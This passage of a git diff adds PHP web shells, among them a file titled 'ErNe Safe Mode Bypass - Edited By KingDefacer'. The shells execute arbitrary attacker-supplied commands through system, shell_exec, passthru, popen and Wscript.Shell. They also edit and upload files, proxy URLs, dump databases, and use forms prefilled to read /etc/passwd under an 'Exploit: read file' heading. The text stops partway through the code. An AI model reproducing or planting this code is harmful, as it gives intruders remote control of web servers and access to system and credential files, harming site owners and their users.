+                         if (function_exists(shell_exec)) {
+                            echo shell_exec($com);
+                              }
+                                 elseif (function_exists(system)) {
+                                   echo system($com);
+                                     }
+                                       elseif (function_exists(passthru)) {
+                                         echo passthru($com);
+                                           }
+                                             else {
+                                              echo "[-]Error";
+                                             }    
+                                          }
+                                       }
+                                    }
+echo "</textarea>";
+exit;
+?> 
+
diff --git a/php/erne.php b/php/erne.php
new file mode 100644
index 0000000..c09e977
--- /dev/null
+++ b/php/erne.php
@@ -0,0 +1,1453 @@
+<tr><td><center><font size="4" color="#FFFFFF"><span style="background-color: #000000">ErNe Safe Mode Bypass - Edited By KingDefacer</span>
+</font></center></td></tr></table>
+<style type="text/css">
+body,td {
+	font-family: "Tahoma";
+	font-size: "12px";
+	line-height: "150%";
+}
+.smlfont {
+	font-family: "Tahoma";
+	font-size: "11px";
+}
+.INPUT {
+	FONT-SIZE: "12px";
+	COLOR: "#000000";
+	BACKGROUND-COLOR: "#FFFFFF";
+	height: "18px";
+	border: 1px solid #666666 none;
+	padding-left: "2px"
+}
+.redfont {
+	COLOR: "#D0D0D0";
+}
+a:link,a:visited,a:active {
+	color: "#9C9C9C";
+	text-decoration: underline;
+}
+a:hover {
+	color: "#FFFFFF";
+	text-decoration: none;
+}
+.top {BACKGROUND-COLOR: "#D0D0D0"}
+.firstalt {BACKGROUND-COLOR: "#000000"}
+.secondalt {BACKGROUND-COLOR: "#000000"}
+</style>
+<SCRIPT language=JavaScript>
+function CheckAll(form) {
+	for (var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function really(d,f,m,t) {
+	if (confirm(m)) {
+		if (t == 1) {
+			window.location.href='?dir='+d+'&deldir='+f;
+		} else {
+			window.location.href='?dir='+d+'&delfile='+f;
+		}
+	}
+}
+</SCRIPT></head><body><center>
+<hr width="775" noshade><table width="775" border="0" cellpadding="0">
+<?PHP
+
+error_reporting(7);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
+if ($onoff != 1) {
+	@extract($_POST, EXTR_SKIP);
+	@extract($_GET, EXTR_SKIP);
+}
+$mohajer =  getcwd();
+$self = $_SERVER['PHP_SELF'];
+$dis_func = get_cfg_var("disable_functions");
+
+///////////////////////////////
+                             //
+$mysql_use = "no"; //"yes"   //
+$mhost = "localhost";        //
+$muser = "shellci_user";       //
+$mpass = "shellci_pass";               //
+$mdb = "shellci_db";         //
+                             //
+///////////////////////////////
+
+
+if (get_magic_quotes_gpc()) {
+    $_GET = stripslashes_array($_GET);
+	$_POST = stripslashes_array($_POST);
+}
+
+
+
+if (empty($_POST['phpinfo'] )) {
+	}else{
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
+	exit;
+}
+
+
+if (isset($_POST['url'])) {
+	$proxycontents = @file_get_contents($_POST['url']);
+	echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>?»?????? URL ?”?????­???§?°?¬</b></p></center></body>";
+	exit;
+}
+
+if  (empty($_POST['erne'] ) ) {
+	}ELSE{
+	$action = '?action=erne';
+	echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#D0D0D0'>
+Powered By Erne, KingDefacer, Ekin0x, Mohajer22, Ja ( Turkey, Suudi Iraq )<br><br>";
+
+    echo "</font></center></td></tr></table> ";
+
+	exit;
+	}
+if  (empty($_POST['command'] ) ) {
+	}ELSE{
+	if (substr(PHP_OS, 0, 3) == 'WIN') {
+		$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
+		$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
+
+		echo "</form>\n";
+	}
+$tb = new FORMS;
+
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
+$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value='  dir  '  id=input><INPUT type='submit'name='erne' value='ernealizm'  id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
+$tb->tablefooter();
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
+
+$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
+
+	echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
+
+        if  ($_POST['command'] )  {
+
+		if ($execfunc=="system") {
+			system($_POST['command']);
+		} elseif ($execfunc=="passthru") {
+			passthru($_POST['command']);
+		} elseif ($execfunc=="exec") {
+			$result = exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="shell_exec") {
+			$result=shell_exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="popen") {
+			$pp = popen($_POST['command'], 'r');
+			$read = fread($pp, 2096);
+			echo $read;
+			pclose($pp);
+		} elseif ($execfunc=="wscript") {
+			$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
+			$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} else {
+			system($_POST['command']);
+		}
+
+	}
+
+echo"</textarea></td></tr></form></table>";
+		exit;
+}//end shell
+
+if ($_POST['editfile']){
+$fp = fopen($_POST['editfile'], "r");
+$filearr = file($_POST['editfile']);
+
+foreach ($filearr as $string){
+
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>";
+echo"<input type='hidden' name='dir' value='" . getcwd() ."'>
+<input type='hidden' name='savefile' value='{$_POST['editfile']}'><br>
+<input type='submit' name='submit' value='Save'></form></center>";
+
+fclose($fp);
+}
+
+
+if($_POST['savefile']){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+if ($doupfile) {
+	echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "?™???‘?«?–?™?„–?¦!" : "?™???‘?«???§?°?¬!";
+}
+
+
+elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
+	if (!empty($newdirectory)) {
+		$mkdirs="$dir/$newdirectory";
+		if (file_exists("$mkdirs")) {
+			echo "can't make dir";
+		} else {
+			echo (@mkdir("$mkdirs",0777)) ? "ok" : "";
+			@chmod("$mkdirs",0777);
+		}
+	}
+}
+
+/////////
+$pathname=str_replace('\\','/',dirname(__FILE__));
+
+////////
+if (!isset($dir) or empty($dir)) {
+	$dir = ".";
+	$nowpath = getPath($pathname, $dir);
+} else {
+	$dir=$_post['dir'];
+	$nowpath = getPath($pathname, $dir);
+}
+
+///////
+$dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm";
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
+$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
+
+$tb = new FORMS;
+
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
+$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value='  dir  '  id=input><INPUT type='submit'name='erne' value='erne '  id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
+$tb->tablefooter();
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur</b></td></tr></table>','center','top');
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>Dosya Duzenle weya Olustur:</FONT>'.$tb->makehidden('dir',  getcwd()  ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','Duzenle','','submit')));
+
+
+$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=#9C9C9C>Dosya Yukle:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Ekle','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
+
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>Dizin Olustur:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','yenidizin','','submit')));
+$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
+
+$tb->tdbody ("</td></tr></table>");
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
+
+
+	$tb->tableheader();
+echo"<tr bgcolor='#D0D0D0'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";
+
+$dirs=@opendir($dir);
+$dir_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="1"){
+		if($file!=".." && $file!=".")	{
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
+			echo "<tr class=".getrowbg().">\n";
+			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">&lt;dir&gt;</span></td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n";
+			echo "</tr>\n";
+			$dir_i++;
+		} else {
+			if($file=="..") {
+				echo "<tr class=".getrowbg().">\n";
+				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n";
+				echo "</tr>\n";
+			}
+		}
+	}
+}// while
+@closedir($dirs);
+
+echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM  method='POST'>";
+
+$dirs=@opendir($dir);
+$file_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="0"){
+		$size=@filesize($filepath);
+		$size=$size/1024 ;
+		$size= @number_format($size, 3);
+		if (@filectime($filepath) == @filemtime($filepath)) {
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+		} else {
+			$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
+			$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
+		}
+		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
+		echo "<tr class=".getrowbg().">\n";
+		echo "  <td style=\"padding-left: 5px;\">";
+		echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
+		echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
+        if  ($file == 'config.php') {
+
+        echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n";
+        }
+        echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
+		echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n";
+		echo "</tr>\n";
+		$file_i++;
+
+
+	}
+}// while
+@closedir($dirs);
+
+echo "</FORM>\n";
+echo "</table>\n";
+}// end dir
+
+
+
+
+
+
+
+	function debuginfo() {
+		global $starttime;
+		$mtime = explode(' ', microtime());
+		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+		echo "Processed in $totaltime second(s)";
+	}
+
+
+	function stripslashes_array(&$array) {
+		while(list($key,$var) = each($array)) {
+			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
+				if (is_string($var)) {
+					$array[$key] = stripslashes($var);
+				}
+				if (is_array($var))  {
+					$array[$key] = stripslashes_array($var);
+				}
+			}
+		}
+		return $array;
+	}
+
+
+	function deltree($deldir) {
+		$mydir=@dir($deldir);
+		while($file=$mydir->read())	{
+			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+				@chmod("$deldir/$file",0777);
+				deltree("$deldir/$file");
+			}
+			if (is_file("$deldir/$file")) {
+				@chmod("$deldir/$file",0777);
+				@unlink("$deldir/$file");
+			}
+		}
+		$mydir->close();
+		@chmod("$deldir",0777);
+		return (@rmdir($deldir)) ? 1 : 0;
+	}
+
+
+	function dir_writeable($dir) {
+		if (!is_dir($dir)) {
+			@mkdir($dir, 0777);
+		}
+		if(is_dir($dir)) {
+			if ($fp = @fopen("$dir/test.txt", 'w')) {
+				@fclose($fp);
+				@unlink("$dir/test.txt");
+				$writeable = 1;
+			} else {
+				$writeable = 0;
+			}
+		}
+		return $writeable;
+	}
+
+
+	function getrowbg() {
+		global $bgcounter;
+		if ($bgcounter++%2==0) {
+			return "firstalt";
+		} else {
+			return "secondalt";
+		}
+	}
+
+
+	function getPath($mainpath, $relativepath) {
+		global $dir;
+		$mainpath_info           = explode('/', $mainpath);
+		$relativepath_info       = explode('/', $relativepath);
+		$relativepath_info_count = count($relativepath_info);
+		for ($i=0; $i<$relativepath_info_count; $i++) {
+			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
+			if ($relativepath_info[$i] == '..') {
+				$mainpath_info_count = count($mainpath_info);
+				unset($mainpath_info[$mainpath_info_count-1]);
+				continue;
+			}
+			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
+		}
+		return implode('/', $mainpath_info);
+	}
+
+
+	function getphpcfg($varname) {
+		switch($result = get_cfg_var($varname)) {
+			case 0:
+			return "No";
+			break;
+			case 1:
+			return "Yes";
+			break;
+			default:
+			return $result;
+			break;
+		}
+	}
+
+
+	function getfun($funName) {
+		return (false !== function_exists($funName)) ? "Yes" : "No";
+	}
+
+
+	class PHPZip{
+	var $out='';
+		function PHPZip($dir)	{
+    		if (@function_exists('gzcompress'))	{
+				$curdir = getcwd();
+				if (is_array($dir)) $filelist = $dir;
+		        else{
+			        $filelist=$this -> GetFileList($dir);//???”?????‘? ?±??
+				    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+	            }
+		        if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+				else chdir($curdir);
+				if (count($filelist)>0){
+					foreach($filelist as $filename){
+						if (is_file($filename)){
+							$fd = fopen ($filename, "r");
+							$content = @fread ($fd, filesize ($filename));
+							fclose ($fd);
+						    if (is_array($dir)) $filename = basename($filename);
+							$this -> addFile($content, $filename);
+						}
+					}
+					$this->out = $this -> file();
+					chdir($curdir);
+				}
+				return 1;
+			}
+			else return 0;
+		}
+
+
+		function GetFileList($dir){
+			static $a;
+			if (is_dir($dir)) {
+				if ($dh = opendir($dir)) {
+			   		while (($file = readdir($dh)) !== false) {
+						if($file!='.' && $file!='..'){
+            				$f=$dir .'/'. $file;
+            				if(is_dir($f)) $this->GetFileList($f);
+							$a[]=$f;
+	        			}
+					}
+     				closedir($dh);
+    			}
+			}
+			return $a;
+		}
+
+		var $datasec      = array();
+	    var $ctrl_dir     = array();
+		var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	    var $old_offset   = 0;
+
+		function unix2DosTime($unixtime = 0) {
+	        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		    if ($timearray['year'] < 1980) {
+				$timearray['year']    = 1980;
+        		$timearray['mon']     = 1;
+	        	$timearray['mday']    = 1;
+		    	$timearray['hours']   = 0;
+				$timearray['minutes'] = 0;
+        		$timearray['seconds'] = 0;
+	        } // end if
+		    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+			        ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	    }
+
+		function addFile($data, $name, $time = 0) {
+	        $name     = str_replace('\\', '/', $name);
+
+		    $dtime    = dechex($this->unix2DosTime($time));
+	        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+		              . '\x' . $dtime[4] . $dtime[5]
+			          . '\x' . $dtime[2] . $dtime[3]
+				      . '\x' . $dtime[0] . $dtime[1];
+	        eval('$hexdtime = "' . $hexdtime . '";');
+		    $fr   = "\x50\x4b\x03\x04";
+			$fr   .= "\x14\x00";
+	        $fr   .= "\x00\x00";
+		    $fr   .= "\x08\x00";
+			$fr   .= $hexdtime;
+
+	        $unc_len = strlen($data);
+		    $crc     = crc32($data);
+			$zdata   = gzcompress($data);
+	        $c_len   = strlen($zdata);
+		    $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+			$fr      .= pack('V', $crc);
+	        $fr      .= pack('V', $c_len);
+		    $fr      .= pack('V', $unc_len);
+			$fr      .= pack('v', strlen($name));
+	        $fr      .= pack('v', 0);
+		    $fr      .= $name;
+
+			$fr .= $zdata;
+
+	        $fr .= pack('V', $crc);
+		    $fr .= pack('V', $c_len);
+			$fr .= pack('V', $unc_len);
+
+	        $this -> datasec[] = $fr;
+		    $new_offset        = strlen(implode('', $this->datasec));
+
+			$cdrec = "\x50\x4b\x01\x02";
+	        $cdrec .= "\x00\x00";
+		    $cdrec .= "\x14\x00";
+			$cdrec .= "\x00\x00";
+	        $cdrec .= "\x08\x00";
+		    $cdrec .= $hexdtime;
+			$cdrec .= pack('V', $crc);
+	        $cdrec .= pack('V', $c_len);
+		    $cdrec .= pack('V', $unc_len);
+			$cdrec .= pack('v', strlen($name) );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('v', 0 );
+			$cdrec .= pack('v', 0 );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('V', 32 );
+			$cdrec .= pack('V', $this -> old_offset );
+	        $this -> old_offset = $new_offset;
+		    $cdrec .= $name;
+
+			$this -> ctrl_dir[] = $cdrec;
+	    }
+
+		function file() {
+			$data    = implode('', $this -> datasec);
+	        $ctrldir = implode('', $this -> ctrl_dir);
+		    return
+			    $data .
+				$ctrldir .
+	            $this -> eof_ctrl_dir .
+		        pack('v', sizeof($this -> ctrl_dir)) .
+			    pack('v', sizeof($this -> ctrl_dir)) .
+				pack('V', strlen($ctrldir)) .
+	            pack('V', strlen($data)) .
+		        "\x00\x00";
+	    }
+	}
+
+	function sqldumptable($table, $fp=0) {
+		$tabledump = "DROP TABLE IF EXISTS $table;\n";
+		$tabledump .= "CREATE TABLE $table (\n";
+
+		$firstfield=1;
+
+		$fields = mysql_query("SHOW FIELDS FROM $table");
+		while ($field = mysql_fetch_array($fields)) {
+			if (!$firstfield) {
+				$tabledump .= ",\n";
+			} else {
+				$firstfield=0;
+			}
+			$tabledump .= "   $field[Field] $field[Type]";
+			if (!empty($field["Default"])) {
+				$tabledump .= " DEFAULT '$field[Default]'";
+			}
+			if ($field['Null'] != "YES") {
+				$tabledump .= " NOT NULL";
+			}
+			if ($field['Extra'] != "") {
+				$tabledump .= " $field[Extra]";
+			}
+		}
+		mysql_free_result($fields);
+
+		$keys = mysql_query("SHOW KEYS FROM $table");
+		while ($key = mysql_fetch_array($keys)) {
+			$kname=$key['Key_name'];
+			if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
+				$kname="UNIQUE|$kname";
+			}
+			if(!is_array($index[$kname])) {
+				$index[$kname] = array();
+			}
+			$index[$kname][] = $key['Column_name'];
+		}
+		mysql_free_result($keys);
+
+		while(list($kname, $columns) = @each($index)) {
+			$tabledump .= ",\n";
+			$colnames=implode($columns,",");
+
+			if ($kname == "PRIMARY") {
+				$tabledump .= "   PRIMARY KEY ($colnames)";
+			} else {
+				if (substr($kname,0,6) == "UNIQUE") {
+					$kname=substr($kname,7);
+				}
+				$tabledump .= "   KEY $kname ($colnames)";
+			}
+		}
+
+		$tabledump .= "\n);\n\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+
+		$rows = mysql_query("SELECT * FROM $table");
+		$numfields = mysql_num_fields($rows);
+		while ($row = mysql_fetch_array($rows)) {
+			$tabledump = "INSERT INTO $table VALUES(";
+
+			$fieldcounter=-1;
+			$firstfield=1;
+			while (++$fieldcounter<$numfields) {
+				if (!$firstfield) {
+					$tabledump.=", ";
+				} else {
+					$firstfield=0;
+				}
+
+				if (!isset($row[$fieldcounter])) {
+					$tabledump .= "NULL";
+				} else {
+					$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+				}
+			}
+
+			$tabledump .= ");\n";
+
+			if ($fp) {
+				fwrite($fp,$tabledump);
+			} else {
+				echo $tabledump;
+			}
+		}
+		mysql_free_result($rows);
+	}
+
+	class FORMS {
+		function tableheader() {
+			echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
+		}
+
+		function headerform($arg=array()) {
+			global $dir;
+			if ($arg[enctype]){
+				$enctype="enctype=\"$arg[enctype]\"";
+			} else {
+				$enctype="";
+			}
+			if (!isset($arg[method])) {
+				$arg[method] = "POST";
+			}
+			if (!isset($arg[action])) {
+				$arg[action] = '';
+			}
+			echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
+			echo "  <tr>\n";
+			echo "    <td>".$arg[content]."</td>\n";
+			echo "  </tr>\n";
+			echo "  </form>\n";
+		}
+
+		function tdheader($title) {
+			global $dir;
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">?·mohajer</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
+			if ($bgcolor=='2') {
+				$css="secondalt";
+			} elseif ($bgcolor=='1') {
+				$css="firstalt";
+			} else {
+				$css=$bgcolor;
+			}
+			$height = empty($height) ? "" : " height=".$height;
+			$colspan = empty($colspan) ? "" : " colspan=".$colspan;
+			echo "  <tr class=\"".$css."\">\n";
+			echo "	<td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tablefooter() {
+			echo "</table>\n";
+		}
+
+		function formheader($action='',$title,$target='') {
+			global $dir;
+			$target = empty($target) ? "" : " target=\"".$target."\"";
+			echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">?·?µ?»??</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function makehidden($name,$value=''){
+			echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
+		}
+
+		function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
+			$css = ($css == 'input') ? " class=\"input\"" : "";
+			$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
+			return $input;
+		}
+        function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){
+			$css = ($css == 'input') ? " class=\"input\"" : "";
+			$input = "<select name=plugin><option>cat /etc/passwd</option></select>";
+			return $input;
+		}
+		 function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){
+			$css = ($css == 'input') ? " class=\"input\"" : "";
+			$input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>";
+			return $input;
+		}
+		function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
+			$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
+			return $textarea;
+		}
+
+		function formfooter($over='',$height=''){
+			$height = empty($height) ? "" : " height=\"".$height."\"";
+			echo "  <tr class=\"secondalt\">\n";
+			echo "	<td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n";
+			echo "  </tr>\n";
+			echo " </form>\n";
+			echo $end = empty($over) ? "" : "</table>\n";
+		}
+
+		function makeselect($arg = array()){
+			if ($arg[multiple]==1) {
+				$multiple = " multiple";
+				if ($arg[size]>0) {
+					$size = "size=$arg[size]";
+				}
+			}
+			if ($arg[css]==0) {
+				$css = "class=\"input\"";
+			}
+			$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
+				if (is_array($arg[option])) {
+					foreach ($arg[option] AS $key=>$value) {
+						if (!is_array($arg[selected])) {
+							if ($arg[selected]==$key) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+
+						} elseif (is_array($arg[selected])) {
+							if ($arg[selected][$key]==1) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+						}
+					}
+				}
+			$select .= "</select>\n";
+			return $select;
+		}
+	}
+
+
+
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap]    & Make file ERORR</b></td></tr></table>','center','top');
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
+
+
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file :</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit')));
+$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit')));
+
+// read file SQL ( ) //
+if(empty($_POST['Mohajer22'])){
+} else {
+echo "read file SQL","<br>" ;
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+$file=$_POST['Mohajer22'];
+
+
